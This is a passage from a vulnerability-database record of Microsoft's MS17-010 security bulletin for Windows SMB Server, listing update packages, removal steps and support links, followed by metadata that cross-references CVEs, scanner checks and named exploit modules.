</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> 
<td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a 
href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "enchantments": {"dependencies": {"modified": "2020-03-17T14:34:52", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", 
"SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], 
"type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-03-17T14:34:52", "rev": 2, "value": 6.6, "vector": "NONE"}}, "hash": "d1dcab535c9bd212ebaacf208acde40134bde87dcba60e8e14fbbf81342169a4", "history": [], "href": "https://support.microsoft.com/en-us/help/4013389/", "id": "KB4013389", "immutableFields": [], "kb": "KB4013389", "lastseen": "2020-03-17T14:34:52", "modified": "2017-03-14T17:40:20", "mscve": "", "msfamily": "", "msimpact": "Remote Code Execution", "msplatform": "", "msproducts": ["14135", "13230", "14478", "14562", "14113", "13228", "11721", "14210", "15514", "17381", "11728", "19589", "11740", "15511", "16735", "11733", "17508", "11719", "14492", "16710", "17651", "17654", "16730", "19759", "13236", "14496", "14490", "14139", "13233", "14501", "14440", "17360", "18472", "19756", "14136", "16625", "13234", "19754", "17657", "14503", "17344", "18875", "14131", "17542", "11708"], "msrc": "MS17-010", "msseverity": "Critical", "objectVersion": "1.5", "parentseeds": [], "primarySupportAreaPath": [{"id": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "name": "Windows Server 2016", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows 
Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "published": "2017-03-11T21:22:44", "references": [], "reporter": "Microsoft", "superseeds": ["KB2508429", "KB896422", "KB923414", "KB971468", "KB982214", "KB3073921", "KB917159", "KB2536275", "KB957095", "KB3177186", "KB958687", "KB975517"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "name": "Windows 8.1 Pro", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "dc52833c-eac7-25b7-b942-b2dfcfbace09", "name": "Windows Server 2012 R2 Essentials", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "8540b382-5304-d506-ece2-a936dd11d66e", "name": "Windows 10, version 1511, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "name": "Windows Server 2008 R2 Datacenter", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "12db0355-c78b-b1b8-0c13-671906e0652d", "name": "Windows Server 2016 Essentials", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": 
"6a967721-27d9-bd5f-9029-99ca5f0436dd", "name": "Windows Server 2012 R2 Foundation", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "name": "Windows 7 Home Basic", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "name": "Windows 7 Ultimate", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "e2b2a040-324c-43bf-447c-75aab15e2570", "name": "Windows Server 2012 Foundation", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "name": "Windows Server 2012 R2 Datacenter", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "1b3bc777-c681-e378-d422-eb618baa26f9", "name": "Windows Server 2012 Essentials", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "670009af-2bc1-fa29-d4a5-99c02e923013", "name": "Windows Server 2008 R2 Standard", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "name": "Windows Server 2012 R2 Standard", "parent": "3ec8448d-ebc8-8fc0-e0b7-9e8ef6c79918", "tree": [], "type": "productversion"}, {"id": "b2012b15-7770-3165-b934-5b004ee86f67", "name": "Windows 8.1", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "e51103b3-9b99-948e-95ff-fd63b48f329b", "name": "Windows 
10, version 1607, all editions", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, {"id": "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "name": "Windows Server 2016 Standard", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}, {"id": "ceefced2-0d6f-a4bd-50d6-875c871b8250", "name": "Windows Server 2012 Datacenter", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "4af945c2-8a39-6b82-777b-5067ce2c9216", "name": "Windows Server 2012 Standard", "parent": "0cfbf2af-24ea-3e18-17e6-02df7331b571", "tree": [], "type": "productversion"}, {"id": "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "name": "Windows 7 Enterprise", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "86630540-cb68-b324-567b-e197838cd28b", "name": "Windows RT 8.1", "parent": "13d0da43-f4d6-9f8e-d090-ed3881084c6e", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "b5011041-7904-59f1-97ca-53b1da5812fb", "name": "Windows 7 Starter", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "name": "Windows 10", "parent": "6ae59d69-36fc-8e4d-23dd-631d98bf74a9", "tree": [], "type": "productversion"}, 
{"id": "2994eca6-696c-b523-20de-40b02211bb3b", "name": "Windows Server 2008 R2 Enterprise", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "6f18bf60-d0f1-8298-413b-89f6e8170528", "name": "Windows 7 Professional", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "32719e08-ef7b-a697-0697-ec02d753dbb5", "name": "Windows Server 2008 R2 Web Edition", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "name": "Windows Server 2008 R2 Foundation", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "417baa75-0c45-df0a-8e65-960580d94f42", "name": "Windows Server 2008 R2 Service Pack 1", "parent": "f08822eb-e7c5-9e48-e44c-760a079f84c0", "tree": [], "type": "productversion"}, {"id": "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "name": "Windows 7 Home Premium", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "name": "Windows 8.1 Enterprise", "parent": "b905caa1-d413-c90c-bed3-20aead901092", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "9087adda-9d1d-0ba1-1b0b-ad434f940308", "name": "Windows 
7 Service Pack 1", "parent": "f825ca23-c7d1-aab8-4513-64980e1c3007", "tree": [], "type": "productversion"}, {"id": "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "name": "Windows Server 2016 Datacenter", "parent": "c3a1be8a-50db-47b7-d5eb-259debc3abcc", "tree": [], "type": "productversion"}], "supportAreaPaths": ["371fbe0b-cb79-c748-a47a-4dc327bf6944", "b2012b15-7770-3165-b934-5b004ee86f67", "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "e51103b3-9b99-948e-95ff-fd63b48f329b", "da37feb8-f7a1-3a1e-aad9-261b598ba5b9", "289fe55d-04e8-fd33-f9f3-f7ad74c153bf", "bebec93f-1b5a-fa13-e8dd-551821a6d3f9", "28a9ef75-2920-9f59-4d6c-4e6d6c99cf4c", "6f18bf60-d0f1-8298-413b-89f6e8170528", "670009af-2bc1-fa29-d4a5-99c02e923013", "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "32719e08-ef7b-a697-0697-ec02d753dbb5", "e2b2a040-324c-43bf-447c-75aab15e2570", "d21af3d6-5cde-c325-4483-c1810c7a5bdd", "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "1b3bc777-c681-e378-d422-eb618baa26f9", "dcf6c6d5-a2d1-b94e-220d-99ddd23d6cbb", "333f3bd9-9578-fda0-5919-4b8fa39524c3", "b5011041-7904-59f1-97ca-53b1da5812fb", "f74948d2-6a6e-d7ce-8733-c201e2d36a2e", "8540b382-5304-d506-ece2-a936dd11d66e", "f62ed778-6986-d76e-c007-40a28315ffbf", "86630540-cb68-b324-567b-e197838cd28b", "928d79ba-72eb-762f-39be-122173e95922", "12db0355-c78b-b1b8-0c13-671906e0652d", "fc8a5f33-cbfe-2a72-73ca-e36deb8fcd9e", "c6dbcbed-7ece-befe-c766-c638f2a7b21e", "fd3a2888-0af1-3691-5303-bc85b4302e62", "c6cab6e3-6598-6a1f-fbb2-f66d3740139d", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "9b513fa9-12cb-5183-ab1b-0d5c70317be8", "ceefced2-0d6f-a4bd-50d6-875c871b8250", "9087adda-9d1d-0ba1-1b0b-ad434f940308", "96bdd47e-5cb0-fbd3-9808-6c4bead5f000", "4af945c2-8a39-6b82-777b-5067ce2c9216", "6f3de84c-ccb0-9b4f-f885-a0071dfc8aa1", "2994eca6-696c-b523-20de-40b02211bb3b", "417baa75-0c45-df0a-8e65-960580d94f42", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", 
"dc52833c-eac7-25b7-b942-b2dfcfbace09", "2b2eeb95-d89c-6614-0db5-88f09133ede6", "6a967721-27d9-bd5f-9029-99ca5f0436dd"], "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "type": "mskb", "viewCount": 128}, "differentElements": ["published"], "edition": 2, "lastseen": "2020-03-17T14:34:52"}], "viewCount": 479, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", 
"EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": 